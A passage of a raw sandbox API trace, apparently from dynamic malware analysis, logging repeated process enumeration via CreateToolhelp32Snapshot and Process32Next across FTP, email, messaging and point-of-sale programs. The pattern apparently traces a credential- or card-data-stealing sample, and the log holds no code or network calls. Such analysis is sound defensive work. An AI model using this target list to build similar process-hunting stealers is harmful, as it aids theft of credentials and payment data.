lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0190.473] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0190.475] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0190.478] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0190.481] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0190.485] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0190.487] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0190.489] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0190.492] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0190.494] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0190.496] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0190.498] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0190.500] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0190.502] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0190.505] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0190.511] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0190.513] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0190.516] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0190.519] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0190.521] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0190.523] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0190.525] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0190.527] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0190.529] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0190.531] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0190.534] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0190.536] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0190.537] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0190.539] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0190.541] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0190.543] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0190.546] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0190.551] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0190.553] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0190.555] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0190.557] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0190.560] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0190.562] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0190.564] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0190.566] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0190.568] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0190.570] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0190.572] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0190.575] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0190.577] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0190.579] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0190.582] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0190.584] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0190.593] Process32Next (in: hSnapshot=0x14c0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0190.596] CloseHandle (hObject=0x14c0) returned 1 [0190.596] Sleep (dwMilliseconds=0x64) [0190.704] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xcb4 [0190.722] Process32First (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.724] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0190.726] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0190.728] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0190.730] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0190.732] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0190.733] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0190.735] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0190.737] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0190.738] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.740] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.741] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0190.770] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.772] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.775] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.777] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.780] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.782] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.784] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.786] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0190.789] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0190.791] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0190.795] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0190.797] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.799] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0190.801] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0190.803] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0190.891] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0190.893] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0190.896] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0190.898] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.901] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0190.903] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0190.906] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0190.908] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.910] Process32Next (in: 